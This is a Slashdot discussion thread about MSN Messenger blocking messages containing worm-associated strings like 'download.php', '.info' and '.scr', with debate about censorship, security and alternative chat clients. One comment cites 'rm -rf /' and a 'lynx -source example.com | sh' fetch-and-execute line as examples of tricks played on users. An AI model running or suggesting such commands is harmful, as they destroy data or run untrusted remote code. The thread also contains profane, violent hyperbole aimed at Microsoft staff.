And if that kid's sister is smart enough to be in college at all, she should know enough to be skeptical. For example, a quick reply of "What was that?" to the brother, who can then say "I didn't send you anything", and then they know what happened.

What's more, don't work on 1000+ college student laptops without at the very least removing admin rights from the students. Or if the laptops belong to the students, make them pay for you to clean up after their messes, and they'll learn very quickly not to click on random crap sent to them via AIM.

But if you really want to do it your way, convince everyone to use Jabber, and give them an official school Jabber account. Then you can do the filtering yourself.

Re:At least they're doing something

And if that kid's sister is smart enough to be in college at all, she should know enough to be skeptical.

You have a lot of faith in computer users don't you. Maybe you should read This Slashdot article.

Simply put, If they can click it, they will.

Re:At least they're doing something

[SanityInAnarchy]

Actually, I have no faith in computer users.

I just don't think it should be IT's job to cover for them.

I have no faith in chainsaw users, either.

But if they cut off a finger, they get to go find a doctor and PAY to have it reattached. It doesn't suddenly become the chainsaw company's liability.

Although in this society, it might well be; after all, there is a chainsaw with a warning label of "Keep away from hands and genitals." Or something to that effect. You have to seriously wonder -- did some moron cut off his balls, and then attempt to sue the chainsaw company?

Old news!

[Stormx2]

This has been known about for years. Here's a digg posting from over a year ago...

Re:Old news!

[hax0r_this]

Its been on the Wikipedia page about MSN for months anyway, maybe a year.

Re:Old news!

[Ilgaz]

This has been known about for years. Here's a digg posting from over a year ago... The issue here is, why does a "Digg" kind of story makes into YRO section of Slashdot.

People on Slashdot were advocating disabling of executable attachments and not allowing them to be double clicked/run on Outlook Express or any kind of mail client. So, MSN people implemented basically same thing on their (yes, their) network for additional security against click happy people.

Since when sending people .exe,scr files is part of our rights? Even screensaver companies doesn't distribute their files via .scr extension, they pack them into zip files. I bet people actually needing to send a executable to their friends either ZIPs or RARs them already.

Dear Slashdot, stop racing with your "light" version. End this policy please.

Re:Old news!

[Stormx2]

Well, we aren't saying they didn't try. The method of catching scammers is just completely futile. If they really felt like catching people who send these viruses, etc, they'd keep a constantly updating list on the msn server. That would find more "bad" links while keeping genuine links.

Office Communicator

[pboyd2004]

.... does the same stuff. I try to send a coworker the name of an exe or a dll and it shoots back that my message could not be sent. So even in a closed corporate environment stuff like this happens. Of course there probably is a way to turn that off at the server side, but our IT department has better things to do like hunting down copies of WinRAR and send us threating emails because "WinZip is our corporate standard compression tool."

Re:Office Communicator

our IT department has better things to do like hunting down copies of WinRAR and send us threating emails because "WinZip is our corporate standard compression tool."

So, what do you do when external vendors/customers send you .rar files? RAR is much less popular than .zip, but it does happen. Call up and annoy the IT department?

If you wanted to be BOFH-ish, get someone to start sending all attachments in .rar format. After 50 support calls, and document all the time you are wasting due to IT policy, I'm sure a steering committee will start a focus group to allow the use of unrar.

Devil's Advocate

[MrNonchalant]

It's probable that they're seeing a lot of automated traffic with these URLs. They know for sure that these are malicious networks and they're spreading on their IM client. Maybe they already patched the vulnerabilities, but these are people who have (apparently) not set auto update to work. Maybe they plan to fix it in the next roll-up but need a stopgap in the meantime. It's not hard to imagine an ethical scenario where you pretty much have to block that traffic. Now the question becomes how. I'm not sure I agree with the silent blocking or the indiscriminate targeting like .info, but the very fact that they're blocking known attack vectors I don't think is a bad idea.

Might Be Time To Bring Back FIDONET

[NeverVotedBush]

I've about had it with Google's spying, Microsoft's spying/interference, Yahoo's spying, and pretty much everything and everyone else that is working to profile ad nauseum.

Re:Might Be Time To Bring Back FIDONET

You seem like a parnoid moron.

Microsoft are doing this to provide what they claim is security. Really they are too lazy to fix the real bugs.

Google and Yahoo! do there spying to provide better services.

What do you think these multi million dollar companies are going to do? black mail you for searching for lesbian porn late at night one time.

Re:Might Be Time To Bring Back FIDONET

[Thomas+Shaddack]

What do you think these multi million dollar companies are going to do? black mail you for searching for lesbian porn late at night one time.

They will just give the logs relevant to you to any lawyer coming it with a subpoena. The lawyer then can blackmail you.

With so many lawyers around, paranoia is circumspection.

All the more reason to use Jabber/XMPP

[MysticOne]

You can set up your own server, you can control your own IM stuffs, and really ... it's just a better solution. You could still go with GTalk if you want access to the Jabber network without setting up a server or doing anything fancy, but in that case I'd recommend encryption for your conversations (you should probably do that anyway). If you just want to set up a new Jabber account on one of the public servers, head on over to jabber.org and pick one out.

Re:All the more reason to use Jabber/XMPP

[sploxx]

Or a good old IRC server! Open and simple and non-XML-bullshit and everything :-)

Re:All the more reason to use Jabber/XMPP

[batkiwi]

Have you looked at the raw IRC protocol? It's "wtf-bullshit," which may or may not be preferable to xml-bullshit, but I do know that XML-bullshit is at least easier to parse.

Jabber

I'd recommend Gajim in Gnome or Psi in KDE or Windows. The only real advantage to using Google Talk is that it enables voice calls to oher Google Talk users but there's a summer of code project to get that in Gajim too and Psi is also getting this soon. Jabber is the future.

Re:Jabber

[Andrew+Kismet]

Yes, and when Jabber updates, GTalk will update with it - faster, sleeker, and branded. Good luck.

spying

[hey]

I wonder if MSN also spies on users. Do they have keywords in place to log messages related to possibly competing products, etc?

Four ways to hide the .php extension

[tepples]

And what does every Linux web server come with?

Perl.

Still, the administrator of a server running PHP 5 can get scripts to run without having .php in the URL by using various forms of content negotiation:

• With Options MultiViews, the client requests /download?foo=bar. Apache HTTP Server will look for a file called download, not find it, and then search for download.* and run the first thing it finds.
• Type-mapped negotiation in Apache works much the same way, except it uses .var files (similar to Windows shortcuts) that point to your script. For instance, /download?foo=bar would reference /download.var, which points to /download.php. It's useful if you have a lot of small requests, for which the repeated directory scans performed by MultiViews might become CPU-bound.
• Rename download.php to download/index.php, and Apache will find it when it scans index.* to display a default page for a directory.
• Last but not least, mod_rewrite.

Re:Four ways to hide the .php extension

[Zonk+(troll)]

Or, do it the way I do.

1. Name the PHP file "download".
2. Use this option either in httpd.conf or .htaccess:

<Files /path/to/file/download>
SetHandler application/x-httpd-php
</Files>

3. Access it like:
http://localhost/download or accept arguments like http://localhost/download/file.odt

If you want to get what comes after the slash, this is all you need:

$thePath = explode("/",ereg_replace($_SERVER['SCRIPT_NAME']," ",$_SERVER['REQUEST_URI']));


file.odt would be located in $thePath[1].

Re:Four ways to hide the .php extension

[Zonk+(troll)]

$thePath = explode("/",ereg_replace($_SERVER['SCRIPT_NAME']," ",$_SERVER['REQUEST_URI'])); There isn't supposed to be a space in the quotes. The lameness filter added that.

Re:Four ways to hide the .php extension

[Dragonslicer]

Still, the administrator of a server running PHP 5 can get scripts to run without having .php in the URL by using various forms of content negotiation: Another option is to use the AddType directive to have other file extensions run through the PHP interpreter. If you don't have any static pages on your site or can accept the minor performance hit, you can send all .html files through PHP.

Re:Four ways to hide the .php extension

[Hooded+One]

As I recall, you can also set an arbitrary extension to be run through PHP in Apache, and just name all your php files that way. Hell, you can even tell it that .html files go through PHP, which might slow down regular HTML (which you can get around further by using .htm for one and .html for the other), but shouldn't cause any other problems.

Or Fannie Mae?

[tepples]

How people NAMED Fanny deal with that, I can't imagine. As far as I can tell, they revert to their legal given name Frances. But then how do people discuss mortgages or chocolates without "Fannie"?

Re:Or Fannie Mae?

[Obsi]

The same way supposed Nigerians who need to get money out of their country do -- by dealing with /dev/null!

Oh please.

[arcade]

Anyone who knows me knows that I haven't used windows since 1999. I simply can't stand the system, nor can I stand the corporation behind it.

However. I'm also interested in computer security.

It _MAKES SENSE_ to block stuff that has been observed in automated worms. It's a simple solution. It's not something that will make all systems invulnerable - but it _MAKES SENSE_. It's a quickfix. A quickfix that works.

This is only "censorship" insofar that it actually prevents stupid automated worms to spread. It's a defensie measure. Not a perfect one, but one.

Oh, and patching the holes. Sure. You can patch the holes. Then everyone has to update .. should we try to protect, or should we ignore those that do not upgrade their systems? The cynic in me tells me : "Let them be cracked". The humanitarian in my tells me: "Well, think of the victims of the DDOS attacks from the botnets of previously-vulnerable people".

I'm dead tired of _idiots_ who thinks that any preventative measure is evil! censorship! bad!

Microsoft is simply trying to help in this case. If you do not like it, use another IM service. Like Yahoo! .. or IRC for that matter. Heck. PLEASE go back to IRC. It's still the best means of communication there is.

So, please you censorship-screaming morons:

SHUT UP! STOP USING THEIR SERVICE IF YOU DO NOT LIKE IT. THEY ARE TRYING TO DO THE RIGHT THING IN THIS INSTANCE !

*phew*. Now I have to go wash my brain. I've just defended satan.

Re:Oh please.

[Zaknafein500]

Generally speaking, I agree with you. Unfortunately, as has been demonstrated in the article, the filtering can be avoided by countless methods of obfuscation. Thus, it's not really accomplishing anything at all.

Re:Oh please.

[BenoitRen]

PLEASE go back to IRC. It's still the best means of communication there is.

If you like to see tons of users idling, sure.

Re:Oh please.

[jb.hl.com]

It's accomplishing a fair amount by blocking some of the main MSN worms. If the messages of existing worms which contain specific phrases are blocked, then that stops in one move those existing worms from spreading in their current form. This is a good thing, if annoying if you have to send a legit URL...

Re:Oh please.

[causality]

It _MAKES SENSE_ to block stuff that has been observed in automated worms. It's a simple solution. It's not something that will make all systems invulnerable - but it _MAKES SENSE_. It's a quickfix. A quickfix that works.

That's just the problem - too many "quickfixes" and not enough inherent security that was part of the design from day one.

Oh, and patching the holes. Sure. You can patch the holes. Then everyone has to update .. should we try to protect, or should we ignore those that do not upgrade their systems? The cynic in me tells me : "Let them be cracked". The humanitarian in my tells me: "Well, think of the victims of the DDOS attacks from the botnets of previously-vulnerable people".

I'm dead tired of _idiots_ who thinks that any preventative measure is evil! censorship! bad!

Microsoft is simply trying to help in this case.

This is needless tampering with network traffic and it's needless because these after-the-fact quickfixes are not the best way to deal with this problem. You have an operating system with associated applications that tend to execute untrusted content from unverifiable sources on an untrusted network, made worse by the fact that the users are not expected to educate themselves since that might not meet the "Easy to Use!" criteria. Of course this situation is going to be a neverending supply of vulnerabilities.

Microsoft, and with them much of the computing world, is looking at this in terms of "fix each exploit as they come along" and they are ignoring the bigger picture of "what is it about this situation that makes so many exploits possible?" This is a "whack-a-mole" situation and it's what leads to so many half-assed, inelegant solutions like blocking IMs that contain certain strings. This sort of filtering, along with virus scanners, spyware scanners, and all after-the-fact "cleaners" need to be recognized for the superficial "band-aid" solutions that they are; that is, perhaps useful for damage control but certainly not a real solution.

Of course perfect security is not possible, but when the difference between damage control and real prevention is more commonly understood, we will be one step closer.

Re:Oh please.

[rat10177sd]

Or, all the wasted bandwidth dedicated to OMG PONIES.

Do Something to Somebody Quick... Boris Badanov

Re:Oh please.

[Ant+P.]

You know, you can minimise that window just the same as you minimise the IM client's buddy list full of idle users. There's nothing forcing you to stare at it all day.

Re:Oh please.

[BenoitRen]

The point is that on IRC you see a bunch of people connected, and often no one talking. So why use it?

Truly, idling is a disease. It exists on IM clients too, but the ratio is far better than on IRC, where 90% of the connected people seem to idle at any time.

Re:Oh please.

[Kalriath]

You know, Google does the same thing with their search engine. If you appear to be using it an inordinately large amount, their search engine will blacklist your IP and throw 403 forbidden every search you send. There are also several search terms they block as well (such as "Powered by IP.Board 2.0.0" and "phpBB2 x.x.x") which cause a 403 when searched for (and no results, and a message telling you that your search term was blocked because it looked like a virus)

Re:Oh please.

Both searches just worked fine for me

Re:Oh please.

[Tama00]

i dont know why this is flagged as flame bait, this guy is correct.

Microsoft censored the words to stop those stupid worms going over everyones msn account, you know those stupid viruses that say, "i found a pic of you at www.somewhere.com/download.php?name=virus" and then some silly teenage girl would go, OMG REALLY and click on it, now she has the virus and its telling all her contacts the name thing.

So how do they put a stop to this, just censor the bloody url so the message wont send.

Some of you guys on slashdot just have got to realise that MOST PEOPLE WHO USES COMPUTERS ARE _NOT_ AS SMART AS YOU! Some wont update there programs, others wont know how to remove the virus and even more will click on stupid links like that.

Fix what?

[defile]

Personally, I'd rather they fix the vulnerabilities that make those strings dangerous in the first place: it's not like IM is the only place a URL can get on your machine.

Someone want to tell me how you fix a user who downloads and runs untrusted executable code?

I've seen plenty of Linux n00bs get tricked into running rm -rf /. Or lynx -source example.com | sh

MSN implementing filters on certain strings is just a small measure in a huge arms race any major IM system has to deal with.

PS. You can save yourself the trouble of replying if you're going to tell me Linux only allows the user to destroy all of his files and not the entire OS.

Re:Fix what?

Someone want to tell me how you fix a user who downloads and runs untrusted executable code?

Send him to a veterinarian? They fix cats and dogs all the time, and humans aren't too different.

Re:Fix what?

[Random832]

PS. You can save yourself the trouble of replying if you're going to tell me Linux only allows the user to destroy all of his files and not the entire OS. Telling you that would be false anyway, see "Run this command as root: ..." or "type 'sudo rm ...' and then it'll ask for your password and type that".

Re:How people named Fanny deal with it

[retrosteve]

How people NAMED Fanny deal with that, I can't imagine.

...probably about the same way that people named Dick, Peter, John Thomas, or Willie do. LOL

Not Just MSN

[eegad]

Amazingly enough, I just discovered this bug in Lotus Sametime a couple of days ago. Whenever I sent a message with a filename ending in .scr, it sent a blank line to the recipient instead. I haven't verified with any of the other identified strings. Maybe there's a common piece of crapware they're both using?

Another blocked keyword?

I ran into this problem a few months pack, trying to paste the url http://www.scrapheap-challenge.com/ to a friend of mine. Absolutely refused to send unless I put a space in there somewhere.

Re:Another blocked keyword?

[Kalriath]

I ran into this problem a few months pack, trying to paste the url http://www.scrapheap-challenge.com/ to a friend of mine. Absolutely refused to send unless I put a space in there somewhere. Nope.

(Slashdot, if I see that fucking "It's been 1 minute since you last posted a comment" again...)

Re:Another blocked keyword?

"(Slashdot, if I see that fucking "It's been 1 minute since you last posted a comment" again...)"

You'll ... what exactly?

Go away?

Re:And if they didnt -- feeping creaturism

These vulnerabilities come from creeping featurism. It's better for their
business model to have all these neat features, even if no one uses them.
Everyone who upgrades is hoping for bug fixes, not new features, but
M$ themselves have said of course they like the current model that keeps
the bucks flowing without them having to make this stuff safe or even work
correctly. They know people are looking for fixes, but not providing them
is what keeps the suckers on the treadmill of upgrades. Hey people -- software
doesn't really wear out or anything like that, especially well written stuff.

Some decisions made a long while back make it virtually impossible for them
to make all this safe in any normal meaning of the word. OLE (then activeX and then COM)
come to mind, as well as the ability of any app to broadcast messages (including
"shut down now" or "eat all this data") make it impossible to make things
safe unless they are disabled. There go all the "features" so it isn't going
to happen.

M$'s approach to "security" included for example, breaking DOS on Win2k in SP2
as it had access to hardware and therefore was unsafe. Never caused us a problem
as we were always careful. But -- to replace our old but perfectly serviceable
DOS CAD software would have cost over $20,000. So we now run it in Linux under
a dos emulator. And we're pitching windows completely out of our shop as it becomes
possible -- we still keep a few dual-boots around to support windows software we've
written for customers but we boot to Linux by default and choice.

At least in Linux, when there's a feature, it was thought out re too-easily-installable
insecurities.
Theres more than one way to do it, in nearly every case.

The Vulnerability Is...

[EXTomar]

...that MSN allows the user to to run things it never should. Or in other words, one should be reasonably expect that using MSN Messenger won't screw up their machine. You should be able to feed it any number of Url from anywhere, trusted or untrusted sources, and it shouldn't do anything bad let alone second guess whether or not the information sent is "good" or "bad". Here is a hint: Untrusted data sources serve untrusted data. Why does Microsoft consider it a feature that MSN Messenger blindly run any files fed to it? And "asking for confirmation" is not sufficient.

Having any IM program make it so easy to run applications from questionable sources is not a secure feature let alone the debate whether or not it is a good one. Asking "Run this? Yes/No" doesn't make the feature any better. Why do people keep thinking it is? MSN Messenger shouldn't be doing this period where the "fix" of filtering on "bad data" by extension is laughable.

Before calling everyone morons...

[_Shorty-dammit]

perhaps you should consider exactly why it is that you think IRC is the best means of communication. Seriously? You think IRC is the best means of communication? No wonder I have so much trouble communicating with someone by going up them and talking to them in person. I should try using IRC next time. Communication always works so much better when there's no pesky voice inflections or body language to deal with, and when there's things like network lag or netsplits. I find I always get my point across when the other person sees half of my message 5 minutes later, and then I disappear in the netsplit before getting the rest of my thought out. You're right, IRC is the best.

Re:Before calling everyone morons...

[arcade]

perhaps you should consider exactly why it is that you think IRC is the best means of communication. Seriously? You think IRC is the best means of communication? No wonder I have so much trouble communicating with someone by going up them and talking to them in person. I should try using IRC next time. Communication always works so much better when there's no pesky voice inflections or body language to deal with,

I don't know if you're being dense on purpose or not, but it should've been pretty obvious that we were talking about communication over the internet and not int he real world.

Even so, communication has a tendency to work better over the network than in the real world for many people. I'm not one of those guys as I'm pretty extrovert (and obviously you too) - but many MANY people prefer email or instant messenging to either face-to-face conversation or telephone calls.

and when there's things like network lag or netsplits. I find I always get my point across when the other person sees half of my message 5 minutes later, and then I disappear in the netsplit before getting the rest of my thought out. You're right, IRC is the best.

One of the _Really Good Things_ about IRC is that you just have an IRC client attached to your screen somewhere, and attach to that screen wherever you are. It's rather okay to have a local challen for yourself and your main friends - where you just chat on and off when you have time - not necessarily needing anyone to reply immediately.

More instant than email. Less nagging than other IM programs.

Not remotely new news...

[MooUK]

This isn't at all new. A few friends and I discovered at least one of these independently over a year ago, and we then found it was a known but little publicised situation before that.

Vulnerabilities

[TopSpin]

I'd rather they fix the vulnerabilities How would you detect the idiocy level of the recipient? If you spam a thousand accounts with "OMG check this http://somedomain/hot-teen-s3x.scr" you just know some fraction of the audience will dutifully follow the link and then dismiss every prompt that appears trying to prevent installation.

Worse, after they get their own machine hacked, they'll blame MSN. They'll contact whatever 'customer service' facility is provided and scream bloody murder. If they manage to get fired as a result they may even sue. Don't doubt that there are employers capable of getting litigious with MSN over it, also.

Sadly, this is the reality of operating an IM/Email/SMS service today. Look carefully at that graphic realize that it is not an exaggeration.

Re:Vulnerabilities

[grcumb]

I'd rather they fix the vulnerabilities How would you detect the idiocy level of the recipient? If you spam a thousand accounts with "OMG check this http://somedomain/hot-teen-s3x.scr" you just know some fraction of the audience will dutifully follow the link and then dismiss every prompt that appears trying to prevent installation.

You know, I think you've got a point - in theory. In practice, however, stupid users tricks just don't have the same catastrophic effect in Linux or OSX. You can point to all kinds of technical details that make it way, but ultimately, you just have to accept that Windows is the least secure desktop environment in wide use today.

Worse, after they get their own machine hacked, they'll blame MSN.

Horse hockey. If people blamed the manufacturer for virus infections, Microsoft would be awash in a sea of litigation. I'll take things one step further and assert that one of the biggest problems software users face is that people do not blame software manufacturers for faults such as this. It's because of this that software security remains an externality for most businesses.

Debugging is still seen as a cost centre, not a profit-driver. And that would be tragic if it weren't so close to being criminal.

Re:Vulnerabilities

[Gunstick]

you know how MS adresses software failures like this?

With popups!
So the user clicks on OK and then it's the user's fault. Not fault of MS for creating an inherently faulty product.

But that there is no user reading the popups or even understanding them is not a problem?
Or even that MS users are nowadays used to just click OK on any popup.

"Why did you click OK" - "why not" - "did you read what it said" - "no, should I?"

PIF your conversation

[Gnaget]

This has been going on for years. PIF at least was censored out about 2 years ago after a virus went around. It's not all bad though, now you can PIF a conversation. When you want to end a multiuser chat, type in *.PIF and everyone will be knocked out.

The Solution!

[causality]

The solution?

Apply some idea of "common carrier" status to MSN. Like the telephone companies, as long as they do not attempt to edit or censor the content that passes through their networks, in any way, then they are not responsible and cannot be held liable for any damage caused by such content. But the moment they start taking measures like this to try to "sanitize" the content of the network, make them legally liable to pay damages for any successful attack/exploit that they are unable to prevent.

Overnight, this stupidity would go away. It would also set a great precedent for any other companies that wish to do this.

Re:The Solution!

It's a private company providing a service for free. They can do what they like. Nobody is going to get them to be a "common carrier." If you're really expecting to rely on MSN for relaying important messages, at least use a client that supports OTR encryption; or preferably switch to Jabber.

Re:The Solution!

[inquisitor]

It would also mean that MSN would be full of spam, scammers, trojan links and so on and Microsoft would be powerless to stop them; it would kill the service overnight. Right now it's fairly sane.

Let's actually understand what Microsoft are doing here: this is not fixing a vulnerability in MSN, as any chat client will send you a URL or can be programatically controlled (often a useful feature in real life); all these messages which the client trying to block are simple URLs, not ways to exploit the Messenger client but the user.

No, this is a badly flawed user protection measure. MSN worms don't spread across MSN as such; what they do is send trojan URLs via the MSN client to the infected user's contact list. The URL of course does not open in Messenger - when you click on it (and don't forget, pidgin has clickable URLs too) Messenger sends it to your HTTP protocol handler, which could be Firefox or Safari or Opera or IE depending on user preference, so any exploit on the server end would be for the browser. However, these are generally simple: it downloads iamatrojan.exe and then you choose to run it, and then it messages all your MSN friends with itself and installs a whole bunch of badware.

Hence the blocks on *.info (full of scammers, very little legitimate content) and download.php (generally a filename used by scammers, as they find it easy to get into servers running PHP) - it's impossible to get a lot of virus sites taken down legally as they're all either hosted in the ex-Soviet Union on certain Seemingly Dodgy ISPs or on r00ted home boxes. Worse, there's way too many of them. (The other user protection mechanism Microsoft have recently taken is user-side encryption and access protection of the contact list, but you need the newest Live Messenger for that.) This seems to be what forced Microsoft into putting this block in; it's wrong, but at least you can see the reasoning.

I really can't see how pidgin et al could actually protect against the same sort of attack without a word filter of some sort, although this one really needs to be more finely grained. Maybe a distributed, user-reported "phishing list" style system (as now used by Firefox and Opera) would be a good move.

Re:The Solution!

[dtobias]

I have legitimate sites in .info domains.

Disproving the article

[jb.hl.com]

joe | optimism is just another word for false hope says: (18:57:18)
http://yro.slashdot.org/article.pl?sid=07/08/05/13 11216
joe | optimism is just another word for false hope says: (18:57:25)
I am now going to disprove this article
joe | optimism is just another word for false hope says: (18:57:27)
*ahem*
joe | optimism is just another word for false hope says: (18:57:52)
Microsoft suck massive donkey cocks. I really, really hope someone kicks Steve Ballmer right in the fucking head, preferably with a steel toed boot
joe | optimism is just another word for false hope says: (18:58:23)
Really, I hope someone burns their shitty excuse for a building to the ground. Fucking cunts.

Messages got through OK. Dunno what the problem is, personally.

'Protocol' /= 'client application'

[Bearhouse]

Pidgin
http://sourceforge.net/projects/pidgin/
(formerly Gaim), see also
http://en.wikipedia.org/wiki/Pidgin_(software)
works fine with MSN.

Only issues are security, (passwords stoed in plaintext - as with most other IM apps) and peer to peer file not working yet via MSN, (goes via servers so is slower). Neither are major hinderances.

Re:'Protocol' /= 'client application'

You could try to use Pidgin with the OTR plugin (if the rest is using it too)

http://en.wikipedia.org/wiki/Off-the-Record_Messag ing

Re:'Protocol' /= 'client application'

[Bearhouse]

Flamebait? Get a life...

Re:'Protocol' /= 'client application'

[bluemonq]

While it's nice and all to use other clients, it doesn't do much good when, say, filtering is *server*-implemented per FP.

First they came for the ...

* First they came for the MSN users and I did not speak out because I was not an MSN user.

* Then they came for the AIM users and I did not speak out because I was not an AIM user.

* Then they came for the Yahoo! users and I did not speak out because I was not a Yahoo! user.

* Then they came for us, the Jabber users, and ... actually they couldn't do fucking anything to Jabber. ;-)

As a side note, the server can't read/block your IMs if they are encrypted. Why aren't you securing your communications in the first place? Pidgin Encryption -> http://pidgin-encrypt.sourceforge.net/

Yet another reason to use IRC

[PeterPowell]

I suppose this is *yet another* good reason to use IRC

-pp

email too

[smchris]

I made the choice of using ".info" for my DSL server. I know a college that bounced email if it has ".info" in the BODY of the email.

Re:email too

[Lehk228]

well then now you know not to be such a cheapskate. the downside to a cutrate domain is you have cutrate neighbors.

Not just censorship

[BenoitRen]

I'm the project owner of the msnmsgr project at MozDev, and I looked into this. I don't know what version of the protocol Adium uses, but mine uses MSNP8. When my message contains one of the things it censors, the switchboard server immediately closes the connection. It's not just censorship; you get booted.

Even better

Stop using MSN and use jabbber or something.

Old News

Isn't this news *really* old? I thought these strings have been blocked for years now, or so I recall reading about them a long time ago.

Real problem

The real problem is between the keyboard and the chair. If someone sends you a URL of http://www.example.com/badstuff/newscreensaver.scr with the message "Really great, you have to try this out!" and the person downloads it, runs it, installs it and infects their computer how can any "security" in Windows (or any other operating system) help this poor deluded user?

Face it, this problem has been around since the first "general purpose" computer fell into an untrained user's hands. Someone handed them a floppy with something they just had to see on it and got their computer screwed up. The methods of infection have improved somewhat - the education, knowledge and skill of the user has not.

I don't see a defense here without making the computer unchangeable by the user.

MSN Is Bad

[RAMMS+EIN]

So you're saying MSN is bad? Gosh, I had no idea! Quick, let's all switch!

Hey, I just heard there are all these open standards that you can use to chat with one another! You won't be dependent on the goodwill of a single company, you needn't worry about peolpe sniffing your messages, and there are lots of other advantages, too!

Guys? Gals? Why is nobody coming with me...?

Items missing from the list

[dilvish_the_damned]

* .info
* profile.php? (including '?')
* download.php? (including '?')
* gallery.php
* pics.php
* ListAllTopics.php
* .scr (source)

Where are the .asp filters? Or is windows mostly vulnerable to php?

Re:Items missing from the list

[Kalriath]

More likely is that they're added at need, and they haven't seen any viruses in the wild that spread via MSN and use .asp files. Expect to see some if suddenly there's a virus that spreads by sending "Hey check out www.badwebsite.com/goto.asp?urlname=forums for free hardcore".

Spam?

[Coolhand2120]

Anyone think maybe it's just a spam filter? I don't use IM of any kind (IRC etc) but when I HAD to in the past I received a lot of spam IM. If 90% of the spam IM has these strings in it (an exaggeration to be sure) then why not stamp it out? I'm sure you wouldn't complain too much if the message you sent to your GMAIL account with the subject 'replica watches with pharmaceutical hudia' didn't go through. I think a good test would be to try the string "Bill Gates sucks Steve Jobs cock", if this makes it through well then, everything important works.

Re:How people named Fanny deal with it

[Grimbleton]

Yeah, my name is Peter Richard (Last name omitted), so imagine the fun I've had.

Well, .php...

[SanityInAnarchy]

I don't suppose it's occurred to Microsoft that PHP is a perfectly valid scripting language used by a significant number of... No, of course they wouldn't. To Microsoft, real websites use ASP.NET...

I mean, I frequently send links to specific webcomics to people I know on IM, but most of the people I know are on Yahoo or something better.

Worth bringing up again!

[SanityInAnarchy]

It's still moronic, and I still think MSN should stop doing it.

And I will keep bringing this up to people who use MSN until either MSN stops, or everyone I know is using some other IM client.

censorship

If they are applying censorship criteria they are also MONITORING what you type... just something to think about. IM = "Instant Monitoring"

Not censored, I tried it myself

[Graviteh]

http://xs218.xs.to/xs218/07310/censorship.jpg Don't kill me because the screenshot features Digg, but I tried sending these myself and my partner on the other end got them just fine. I wonder if this censorship is just situational or happens to only some people, and/or happens at random times.

Re:Not censored, I tried it myself

[Random832]

It might vary per server. I saw this story somewhere else and .info wasn't on the "full list" from someone who actually hacked a client to ask the server for the whole list

http://forums.worsethanfailure.com/forums/18/ShowF orum.aspx

http://www.amsn-project.net/forums/viewtopic.php?t =157&postdays=0&postorder=asc&start=30

"image001.png" is blocked - because no-one ever uses a filename for something other than what someone else has used that filename for, no matter HOW generic it is, once someone's used a filename it's "taken" forever and always refers to that one evil exploit it was used for.

Full list

[marcansoft]

kakaroto from the amsn project somehow obtained the full censored regexp list. There are about 90 in total.

http://www.amsn-project.net/forums/viewtopic.php?t =157&postdays=0&postorder=asc&start=30

They ought to censor....

[madbawa]

....msmsgs.exe

Old news

[Buzer]

I remember submiting similar story about 1.5-2 years ago and it got rejected. The only difference is that now MSNM tells the message couldn't be sent, back then it simply got censored (more times than once I pasted url with download.php? to friend and asked a bit later if they had already downloaded it to direct them further and they were like "Downloaded what?")

Latest version introduced this - Use ZIP or RAR

It's the latest update (July) that introduced this. I hadn't upgraded but a friend did. He could no longer receive MP3 files (We're game developers; Our sound files are all MP3 format! Nothing illegal here!!!!!!!)

Zipping is the way around this filter.

Get off my lawn, I'm keeping that frisbee!

[Scrameustache]

I had the same problem.... I picked better friends.
  Anyone that I have any relation with knows that I will not contact them via MSN, AIM, My Space, Live Journal or any of their like. You must be ever so much fun at parties!

I suggest that they learn to use IRC or obtain a HAM radio license with a morse code rating, and I will gladly send them an instant message. [...] If they do not find a medium that is commonly available and required for business communications as aceptable, then I really don't want to be associated with them. Bah Humbug!

Make sure they don't waste any of that coal in the chimney, too!

catch 22

[Scrameustache]

This isn't censorship; it's just a poor firewall. The difference is that the former is for stifling human communication, while the latter is to protect machines from malicious software. Tell it to china.
So some of what they arbitrarily block is for asinine security reasons? When hackers come up with the key to a Microsoft owned DRM ploy, wanna bet that string will also be blocked, server side, for security?

Lies and pretenses

[Scrameustache]

Personally, I'd rather they fix the vulnerabilities that make those strings dangerous in the first place: it's not like IM is the only place a URL can get on your machine.

Do you really think they're diverting resources away from fixing bugs so that they can add "censorship" features to IM? Perhaps this is just one effort among multiple efforts to correct problems AND mitigate their effects?

test.info
12:45
Could not send; a connection error occurred.

They did not correct a problem, they created a new one.
How hard would it be to have a message "could not send, content of message is not allowed"?
It would cause people to realize there is something wrong, rather than blaming it on the dog, as they choose to do. So they censored that tidbit by censoring our messages, the bastards.

Re:Lies and pretenses

[Fastolfe]

How hard would it be to have a message "could not send, content of message is not allowed"?

I don't know, but I bet it would cost more to present the user with that message than it would cost to simply drop the messages on the floor. I absolutely agree that this is a poor user experience, but I have no clue how easy or difficult it would be to make it better. Do you? A good manager would then compare that cost with the estimated impact on the users. How many users send legitimate messages that would be caught by this filter? Enough to matter? Do you have all of the facts here that would qualify you to make that decision?

Re:Lies and pretenses

[Scrameustache]

Do you have all of the facts here that would qualify you to make that decision?

Lets not pretend this was a decision of facts when we all know it was a decision of PR.

can't we all just get along?

[teh_chrizzle]

I get it.. you are one of THOSE users, who thinks he knows more than we do about how computers work, and how corporate IT should be run.

my bet is that the parent poster is a developer or a DBA. the "devs vs. IT" battle is an old one. i'll sum it up: IT guys are fascist pigs, and dev's are whiny spoiled brats. (see also: video conferencing vs IT, R&D vs. IT, and IT vs. the NOC) it's true, everyone really needs to lighten up :-)

it's wrong for people to subvert IT policies. it's wrong for IT departments to implement policies that people have to subvert in order to do their jobs. as we all know, two wrongs don't make a right.

there are two ways to fix the problem:

one way is for IT to exchange compliance for support. IT agrees only to support compliant machines. it will not support non-complaint machines, nor will it remove them. if you want to be a local admin and download tons of crazy crap from the net, go ahead, but you have to provide your own support for your issues. if you have a problem that you can't fix, IT will happily ghost your machine back into compliance or repair any defective hardware. if it has been determined that your machine has done something wrong (transmitted a virus, contained material that puts the company at risk of legal action) then we will pull your network connection until your machine is complaint once again. a clearly defined and easily referenced policy of "quid pro quo" support makes life easier for the IT department and can afford some much needed freedom for the "lone advanced user" who so often runs afoul of draconian IT practices.

the other option is to the separation of development and corporate assets. a development network with few restrictions is available, but it will have no access to or from the corporate LAN or the production environment. all machines on the development network are the sole responsibility of the developers. the DevNet is managed in some manner to keep corporate machines out, and the CorpNet is managed in a similar manner to keep the development machines out (no switching network cables you naughty devs!) the IT department can then administer uniformity on CorpNet until it is blue in the face, and the devs get to be free to do as they please on the DevNet until someone gets sued or arrested.

in both cases, people who think they are smarter than the IT guys get to do as they please and must play ball in order to get support. hilarity ensues whenever one group has to turn to the other for help.